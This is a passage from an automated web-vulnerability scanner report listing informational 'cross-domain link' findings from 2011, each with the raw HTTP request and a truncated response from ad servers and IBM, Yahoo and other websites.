User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Length: 1831
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:09 GMT; path=/
Set-Cookie: _curtime=1316221449; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:14:09 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1536825855=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:09 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=16233E2D-E708-4A27-9A6C-AFFA9B0751F6&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38484872%26rk1%3D72091245%26rk2%3D1316239534.984%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>
...[SNIP]...

17.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.38578117452561855&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1868
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1710273189=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...
<'+'noscript><a href="http://a.collective-media.net/jump/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?" target="_blank"><img src="http://a.collective-media.net/ad/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?" width="160" height="600" border="0" alt=""></a>
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=News" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');

17.132. http://us.adserver.yahoo.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /a

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a?f=2115823648&p=yahoo&l=MIP&c=h&bg=ffffff&rand=1200349473225&at=content%3D%22no_expandable%22 HTTP/1.1
Host: us.adserver.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:21 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, no-store, max-age=0
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2299

<html><head><base target="_top"></head>
<body bgcolor="ffffff">
<script>var mrec_target="_blank";var mrec_URL=new Array();mrec_URL[1]="http://global.ard.yahoo.com/SIG=15qbgeh62/M=731609.13380281.1348
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flashx/mrec20100406.js"></script>
...[SNIP]...
316228062/L=OFaDqDIxNi47oxU0TnPvuSIfNTAuMk5z772fv.HE/B=lqCrM0oGYzQ-/J=1316220862027908/K=LiPPjYwPC6eKlLJYCHNgOA/A=6150871/R=2/id=noscript/SIG=110kkc2d3/*http://comedy.video.yahoo.com/" target="_blank"><img src="http://ads.yimg.com/a/a/bu/butterfinger/071510_300x125_butterfinger_bcn_cobranded.jpg" width="300" height="125" border="0"></a>
...[SNIP]...

17.133. http://weather.yahoo.com/badge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weather.yahoo.com
Path:   /badge/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /badge/?id=2354490&u=f&t=default&l=tiny HTTP/1.1
Host: weather.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.astac.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:54 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 5900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
   <title>Yahoo! Weather Widget | Badge - Yahoo! Weather</title>
   <link rel="stylesheet" href="http://l.yimg.com/a/lib/ywc/css/badge.0.4.min.css"></link>
...[SNIP]...
</a><a target="_blank" class="twcilogo" href="http://yahoo.weather.com/?par=yahoo&site=yahoobadge&promo=0&cm_ven=Yahoo&cm_cat=yahoobadge&cm_pla=horizontal&cm_ite=homepage"> <img alt="weatherchannel logo" src="http://l.yimg.com/a/lib/ywc/img/spacer.gif"/></a></div>
</div><script src="http://us.js.yimg.com/lib/rapid/rapid_2.0.0.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128fqh6m0(gid$2BqdJWKJhs7pARpjTl.wjRNyMhd7ak5zp3IADjbo,st$1316202354961720,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

17.134. http://www-01.ibm.com/support/docview.wss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-01.ibm.com
Path:   /support/docview.wss

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /support/docview.wss?uid=swg27016186 HTTP/1.1
Host: www-01.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?q=faq+help+phone+xss&cc=us&en=utf&co=us&sn=mh&lang=en&lo=any&hpp=100
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:58:57 GMT
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: 17 09 2011 01:58:57 GMT
Last-Modified: Tue, 16 Aug 2011 14:20:44 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 127929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico"/>
...[SNIP]...

17.135. http://www-03.ibm.com/innovation/us/watson/images/arrows/arrows.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-03.ibm.com
Path:   /innovation/us/watson/images/arrows/arrows.png

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /innovation/us/watson/images/arrows/arrows.png?1311778051 HTTP/1.1
Host: www-03.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-03.ibm.com/innovation/us/watson/stylesheets/compiled/screen.css
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:54:42 GMT
Server: IBM_HTTP_Server/7.0.0.15
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 8637
Proxy-Connection: Keep-Alive
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/" />
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico" />
...[SNIP]...
<li>For information on ThinkPad notebooks, ThinkCentre desktops and other PC products, start from the <a href="http://www.lenovo.com/">Lenovo homepage</a>
...[SNIP]...

17.136. http://www-142.ibm.com/software/products/us/en/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-142.ibm.com
Path:   /software/products/us/en/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss HTTP/1.1
Host: www-142.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Via: HTTP/1.1 www-142.ibm.com (IBM-PROXY-WTE)
Date: Fri, 16 Sep 2011 19:54:20 GMT
Server: IBM_HTTP_Server/6.0.2.43 Apache/2.0.47 (Unix)
Keep-Alive: timeout=10, max=100
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Warning: 214 www-142.ibm.com "Transmogrified" "Fri, 16 Sep 2011 19:54:20 GMT"
Content-Length: 30213


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-U
...[SNIP]...
icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico"/>
...[SNIP]...

17.137. http://www-304.ibm.com/support/operations/us/en/invoicespayments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /support/operations/us/en/invoicespayments

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /support/operations/us/en/invoicespayments?lnk=mhmy HTTP/1.1
Host: www-304.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
date: Fri, 16 Sep 2011 19:57:29 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/2.0.47.1-PK53584 Apache/2.0.47 (Unix) DAV/2
Content-Length: 21004


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang=
...[SNIP]...
<!-- MetaTags TOTAL TIME 687ms -->

   
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/favicon.ico"/>
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/all.css" media="all" rel="stylesheet" title="www" type="text/css"/>

<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/screen.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/screen-uas.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>


<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/v16/css/us/en/screen-fonts.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>

<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/handheld.css" media="handheld" rel="stylesheet" title="www" type="text/css"/>
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/print.css" media="print" rel="stylesheet" title="www" type="text/css"/>
<script src="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/js/ibmcommon.js" type="text/javascript">//</script>
...[SNIP]...
<li><a class="ibm-feature-link" href="http://iol.dbexpress.net/am/us/en" onclick="window.open('/easyaccess/cpe/html0/126956.html','ibmus','height=281,width=410,screenX=30,screenY=20,top=20,left=30,status=no,location=no,toolbar=no,directories=no,menubar=no,resizable=yes,scrollbars=yes');return false;" target="_blank">View, print and download your invoices and credit notes</a>
...[SNIP]...

17.138. http://www-304.ibm.com/support/operations/us/en/orderdelivery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-304.ibm.com
Path:   /support/operations/us/en/orderdelivery

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /support/operations/us/en/orderdelivery?lnk=mhmy HTTP/1.1
Host: www-304.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
date: Fri, 16 Sep 2011 19:57:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/2.0.47.1-PK53584 Apache/2.0.47 (Unix) DAV/2
cache-control: no-cache="set-cookie,set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=0000ndqbkupauFWNanvu6jEGCI-:115n6mauu; Path=/
Content-Length: 19977


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang=
...[SNIP]...
<!-- MetaTags TOTAL TIME 914ms -->

   
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/favicon.ico"/>
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/all.css" media="all" rel="stylesheet" title="www" type="text/css"/>

<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/screen.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/screen-uas.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>


<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/v16/css/us/en/screen-fonts.css" media="screen,projection" rel="stylesheet" title="www" type="text/css"/>

<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/handheld.css" media="handheld" rel="stylesheet" title="www" type="text/css"/>
<link href="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/v16/css/print.css" media="print" rel="stylesheet" title="www" type="text/css"/>
<script src="https://a248.e.akamai.net/f/248/47542/30d/www.ibm.com/common/cdn/js/ibmcommon.js" type="text/javascript">//</script>
...[SNIP]...

17.139. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-935.ibm.com
Path:   /services/us/igs/smarterdatacenter.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /services/us/igs/smarterdatacenter.html?lnk=mhse HTTP/1.1
Host: www-935.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/products/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:57:51 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Length: 28273
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta
...[SNIP]...
ra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
   <link rel="schema.DC" href="http://purl.org/DC/elements/1.0/" />
   <link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico" />
...[SNIP]...

17.140. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actvalue.com
Path:   /pages/asp/editorial/ps_rfid.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware HTTP/1.1
Host: www.actvalue.com
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSRBDSBS=MIBFIBDBGCMIPOEOIPCEIHHM

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache
Pragma: no-cache,no-cache
Content-Type: text/html
Expires: Sun, 31 Dec 1989 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:36 GMT
Content-Length: 33643

<html><head><title>Tecnologia RFId - Radio Frequency Identification - Tecnologia attiva e passiva - Componenti principali: trasponder (tag), antenna, middleware</title><meta http-equiv="X-UA-Compatibl
...[SNIP]...
<link rel="stylesheet" href="/images/stile.css" type="text/css"><script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.4.min.js"></script>
...[SNIP]...
<SPAN><a href="http://actvalue.blogspot.com/" class="box_article_title" target="_blank">&nbsp;ActValue Blog</a>
...[SNIP]...
<SPAN><a href="http://actvalue.blogspot.com/" class="box_article_text" target="_blank">Riflessioni e opportunit&agrave; nel mondo della tecnologia.</a>
...[SNIP]...
